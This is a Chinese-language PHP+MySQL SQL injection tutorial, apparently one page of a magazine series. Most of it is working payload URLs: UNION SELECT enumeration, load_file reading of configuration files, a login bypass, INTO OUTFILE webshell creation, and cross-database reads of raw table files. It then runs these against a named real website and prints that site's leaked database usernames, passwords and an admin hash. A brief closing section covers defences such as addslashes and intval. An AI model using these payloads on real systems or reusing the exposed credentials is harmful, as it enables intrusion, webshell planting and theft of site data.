三：一些注入技巧，很多都是个人发现哦
1.union select的技巧
UNION 用于将多个 SELECT 语句的结果联合到一个结果集中。在 SELECT 中的 select_expression 部分列出的列必须具有同样的类型。第一个 SELECT 查询中使用的列名将作为结果集的列名返回。
然而有我们可以用下面的方法来猜测列的类型，可是省去很多时间
我们先
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18

看看软件描述里写着3，作者里写着4，我们就可以猜测3和4的位置是字符型的，我们再看14前面的是下载次数，这就应该是int型的了，对吧。
好了，我们根据这里来构建吧，估计username和password也是字符型的。
试试看哦
http://localhost/down/index.php?url=&dlid=1%20and%201=2%20union%20select%201,2,password,4,username,6,7,8,9,10,11,12,13,14,15,16,17,18%20from%20dl_users

哈哈，这种方法只要看看就可以大概猜到了。
2.load_file读写文件的技巧
不知道你有没有发现过在我们用load_file()读写php文件时不能在网页中显示。例如：
`C:/apache/htdocs/site/lib/sql.inc.php`转化为16进制为：0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870
我们构造如下
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11

发现在文章内容的地方本来该显示sql.inc.php的，可是却空空之，为何呢？
我们看看网页的源代码先

哈哈，看看标记的地方，晕死，原来在这里啊，可是为什么哩？
原来html中< >用于标注，哈哈，明白了吧！下次可得记得在哪里找哦。

4. md5的恶梦
山东大学的王博士最近可是搞md5搞的红透了，我们也来搞一搞吧，我们比他更爽，不用计算，哈哈。
md5我们是有办法绕过的，但是并不是哪里都可以，php中的md5函数就不能绕过，因为你输入的所有东西都在里面，根本跑不出。可以绕过的是sql语句中的md5。当然别的sql中的函数也是可以绕过的，道理相同哦。
看例子先：
//login.php
……
$query="select * from alphaauthor where UserName=md5($username) and Password=`".$Pw."`";
……
?>
我们直接在浏览器提交
http://localhost/admin/login.php?username=char(97,98)) or 1=1 %23
带入sql语句成为select * from alphaauthor where UserName=md5(char(97,98)) or 1=1 #) and Password=`".$Pw."`
记得md5里面放的是字符，因为后面有or 1=2，所以我们随便放了个char(97,98). Ok，登陆成功了哦！看看，md5在我们面前也没有什么用处。

5. 核心技术，利用php+mysql注入漏洞直接写入webshell。。
直接利用注入得到webshell，这应该是大家都很想的吧，下面就教给你。
这里假设你已经知道了网站所在的物理路径，我这里假设网站路径为c:/apache/htdocs/site。网站的mysql连接信息放在/lib/sql.inc.php里

1）适用于magic_quotes_gpc＝Off
假设我们可以上传图片，或者txt，zip，等其它东西，我们把我们的木马改成
jpg后缀的，上传后路径为/upload/2004091201.jpg
2004091201.jpg中的内容为
好，我们开始http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(`C:/apache/htdocs/site/upload/2004091201.jpg`),4,5,6,7,8,9,10,11%20into%20outfile`C:/apache/htdocs/site/shell.php`
因为适用了outfile，所以网页显示不正常，但是我们的任务是完成了。
我们赶快去看看http://localhost/site/shell.php?cmd=dir
爽否？Webshell我们已经创建成功了。看到最前面的12了没？那就是我们select 1，2所输出的！

2）下面再讲一个适用于magic_quotes_gpc＝On的时候保存webshell的方法哦，显然肯定也能用在于magic_quotes_gpc＝Off的时候啦。
我们直接读他的配置文件，用技巧2介绍的方法
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(0x433A2F6170616368652F6874646F63732F736974652F6C69622F73716C2E696E632E706870),4,5,6,7,8,9,10,11
得到sql.inc.php内容为
<?$connect=@mysql_connect("localhost","root","") or die("Unable to connect to SQL server");mysql_select_db("alpha",$connect) or die("Unable to select database");?>
好了我们知道了mysql的root密码了，我们找到phpmyadmin的后台
http://localhost/phpmyadmin/
用root密码为空登陆。

然后我们新建立一个表结构内容如下：
#
# 数据表的结构 `te`
#
CREATE TABLE te (
cmd text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;

#
# 导出下面的数据库内容 `te`
#
INSERT INTO te VALUES (``);
Ok，是我们用select * from table into outfile’’的时候了
直接在phpmyadmin的sql输入
SELECT * FROM `te` into outfile `C:/apache/htdocs/site/cmd1.php`;
如图31

Ok，成功执行，我们去http://localhost/site/cmd1.php?cmd=dir看看效果去
如图32

好爽的一个webshell是吧！哈哈，我也很喜欢。
不过不知道大家有没有发现我们是在magic_quotes_gpc＝On的情况下完成这项工作的，竟然在phpmyadmin里可以不用考虑引号的限制，哈哈，说明什么？说明phpmyadmin太伟大了，这也就是我们在谈magic_quotes_gpc＝On绕过时所卖的那个关子啦！
6.发现没有我们还可以利用update和insert来插入我们的数据，然后来得到我们的webshell哦，还用上面的那个例子，
//reg.php
……
$query = "INSERT INTO members
VALUES(`$id`,`$login`,`$pass`,`$email`,’2`)"
……
?>
我们在email的地方输入
假设我们注册后的id为10
那么我们可以再找到一个可以注入的地方
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,email,4,5,6,7,8,9,10,11%20from%20user%20where%20id=10%20 into%20outfile`C:/apache/htdocs/site/test.php`
好了，我们又有了我们的wenshell了哦。
7.mysql的跨库查询
大家是不是一直听说mysql不能跨库查询啊，哈哈，今天我将要教大家一个好方法，通过这个方法来实现变相的跨库查询，方法就是通过load_file来直接读出mysql中data文件夹下的文件内容，从而实现变态跨库查询。
举个例子啦
在这之前我们先讲一下mysql的data文件夹下的结构
Data文件夹下有按数据库名生成的文件夹，文件夹下按照表名生成三个后缀为frm,myd,myi的三个文件，例如
Mysql中有alpha数据库，在alpha库中有alphaauthor和alphadb两个表，
Alpha文件夹内容如下图33

其中alphadb.frm放着lphadb表中的数据，alphadb.frm放着表的结构，alphadb.myi中放的内容随mysql的版本不通会有所不同，具体可以自己用记事本打开来判断。
实验开始
假设我们知道有另外的一个数据库yminfo210存在，且存在表user，user中放这admin的信息。
我们
http://localhost/site/display.php?id=451%20and%201=2%20%20union%20select%201,2,load_file(`yminfo210/user.myd`),4,5,6,7,8,9,10,11
说明一下，load_file默认所在的目录是mysql下的data目录，所以我们用
load_file(`yminfo210/user.myd`)，当然load_file(`.info210/user.myd`)也是一样的，注意的是into outfile的默认路径是在所在的数据库文件夹下。

我们看读出来的内容
???? admin 698d51a19d8a121ce581499d7b701668 admin@yoursite.comadmin question admin answer http://www.yoursite.com (????KA???? 127.0.0.1 d|??? aaa 3dbe00a167653a1aaee01d93e77e730e sdf@sd.com sdfasdfsdfa asdfadfasd ?E?AM?A 127.0.0.1 222 222222223423
虽然乱码一堆，但是我们还是可以看出用户名是admin，密码是698d51a19d8a121ce581499d7b701668，后面其它的是另外的信息。
通过这种方法我们就实现了曲线跨库，下面的例子中也会提到哦！

说了这么多下面我们来具体的使用一次，这次测试的对象是国内一著名安全类站点——黑白网络
听人家说黑白有漏洞？我们一起去看看吧。
http://www.heibai.net/down/show.php?id=5403%20and%201=1
正常显示。

http://www.heibai.net/down/show.php?id=5403%20and%201=2
显示不正常。

好，我们继续
http://www.heibai.net/down/show.php?id=5403%20and%201=1 union select 1
显示结果如下

注意看图中没有显示程序名，而且还附带了
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in D:webheibaidownshow.php on line 45
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in D:webheibaidownglobal.php on line 578

晕了，网站路径出来耍?强删退蓝?伺叮?br /> 我们继续，直到我们猜到
http://www.heibai.net/down/show.php?id=5403%20and%201=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
的时候正常显示了。

好我们转换语句成为
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19

看看简介处显示为12，我们可以猜测此处应该为字符型！
Ok，我们下面看看文件内容先
D:/web/heibai/down/show.php转化成ascii后为
char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)
我们
view-source:http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,115,104,111,119,46,112,104,112)),13,14,15,16,17,18,19
view-source:是指察看源代码，至于为什么用，我们后面将讲到
显示出它的源代码

因为在show.php中有一句

如果我们直接在浏览器里提交会跳转到list.php
我们发现这句require ("./include/config.inc.php");
好东西，应该放这配置文件，ok继续
d:/web/heibai/down/include/config.inc.php
转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
我们输入
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,100,111,119,110,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
里面内容主要有
…………………..
ymDown (夜猫下载系统) 是一个应用于网站提供下载服务的的程序
// ------------------------- -------- ------------------------- //
// 常规设置 //
// ------------------------- -------- ------------------------- //

// 数据库信息
$dbhost = "localhost"; // 数据库主机名
$dbuser = "download";// 数据库用户名
$dbpasswd = "kunstar988"; // 数据库密码
$dbname = "download"; // 数据库名

// Cookie 名称
$cookie_name = "heibai";
// 版本号
$version = "1.0.1";

// 数据表名
$down_table = ymdown;
$down_user_table = ymdown_user;
$down_sort1_table = ymdown_sort1;
$down_sort2_table = ymdown_sort2;
晕原来用的是夜猫的下载系统，而且我们知道了
$dbuser = "download";// 数据库用户名
$dbpasswd = "kunstar988"; // 数据库密码
说不定呆会有用哦。
用的表名是默认的表名，我们知道夜猫的管理员密码放在ymdown_user中
我们继续http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,username,5,password,7,8,9,10,11,12,13,14,15,16,17,18,19 from ymdown_user

根据提示我们知道文件大小处的是username，应用平台处的是password（对照图36）
即username=dload，password＝6558428，夜猫的后台默认在admin目录下，我试验了很久都没有找到，晕之。
想直接连接mysql，发现telnet端口并没有开放。我们去看看别的吧！
http://www.heibai.net/vip/article/login.php
看起来像是会员的登陆哦，我们看看先
d:/web/heibai/vip/article/login.php
转化成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)
我们输入
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,108,111,103,105,110,46,112,104,112)),13,14,15,16,17,18,19 
其中
require ("./include/global.php");
require ("./include/config.inc.php");
require ("./mainfunction.php");
require ("./function.php");
当然了，我们去看config.inc.php吧
d:/web/heibai/vip/article/include/config.inc.php
转成char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)
输入
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(100,58,47,119,101,98,47,104,101,105,98,97,105,47,118,105,112,47,97,114,116,105,99,108,101,47,105,110,99,108,117,100,101,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112)),13,14,15,16,17,18,19
显示了很多好东西哦

$dbhost = "localhost"; // 数据库主机名
$dbuser = "root"; // 数据库用户名
$dbpass = "234ytr8ut"; // 数据库密码
$dbname = "article"; // 数据库名
$ymcms_user_table = "user";
$ymcms_usergroup_table = "usergroup";
$ymcms_userrace_table = "userrace";
表还是默认的表，而且出来了root的密码
要是能连上它的mysql该多好啊，那样我们就可以into outfile了
痛苦的找了找phpmyadmin，没有找见，或许根本就没有用。
读c:/winnt/php.ini发现
; Magic quotes
;
; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = On
55555555，痛苦中，我们看看能不能搞几个会员账号
猜测会员账号放在user表中，我们直接读data下article文件夹里的user.myd文件
Article/user.myd转换成
char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)
我们输入
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,109,121,100)),13,14,15,16,17,18,19
结果如图45：

晕了，竟然没有返回。我们来读Article/user.frm
http://www.heibai.net/down/show.php?id=5403%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file(char(97,114,116,105,99,108,101,47,117,115,101,114,46,102,114,109)),13,14,15,16,17,18,19
结果如图46

晕了，表结构都在，而且读Article/user.myi时也成功，可是为什么Article/user.myd读不出来呢?要是magic_quotes_gpc＝Off我们还可以into outfile来看看，可是……
郁闷中，测试就这样结束吧，下面的工作还是留给你们来完成吧！
文中所述问题已经通知星坤了！

四：php＋mysql注入的防范方法。
在上一期的专题里已经讲了很多的防范方法，这里我就主要讲一下php+mysql注射攻击的防范方法。
大家看到，在magic_quotes_gpc＝On的时候，很多的注射攻击已经没有作用了。
我们可以利用这个来加固我们的程序。Addslashes（）函数等同于magic_quotes_gpc＝On，而且与magic_quotes_gpc＝On也不冲突，我们可以这样过滤
$username = addslashes($username);
$query="SELECT * FROM users WHERE userid=`$username`");
对于id型我们可以利用intval()函数，intval()函数可以将变量转换成整数类型，这样就可以了。
我们可以这样
$id = intval($id);
$query="SELECT * FROM alphadb WHERE articleid=`$id`");
如果是字符型的呢？
我们可以先用addslashes()过滤一下，然后再过滤”%”和”_”.
例如：
$search = addslashes($search);
$search = str_replace("_","\_",$search);
$search = str_replace("%","\%",$search);
记得，可千万别在magic_quotes_gpc＝On的情况下替换为\,如下：
$password=str_replace("\","\\",$password);
我记得在darkness的文章《对某PHP站点的一次渗透》中提到过这个问题（在光盘中有收录）。
还有的就是登陆的地方，如果是只用一个管理员管理的话，我们可以直接对username和passwd用md5加密，这样就不用害怕注入技术的发展了。
Username=md5($HTTP_POST_VARS["username"]);
Passwd=md5($HTTP_POST_VARS["passwd"]);
我的后台登陆就是这样子的哦。

上一页  [1] [2] [3] [4]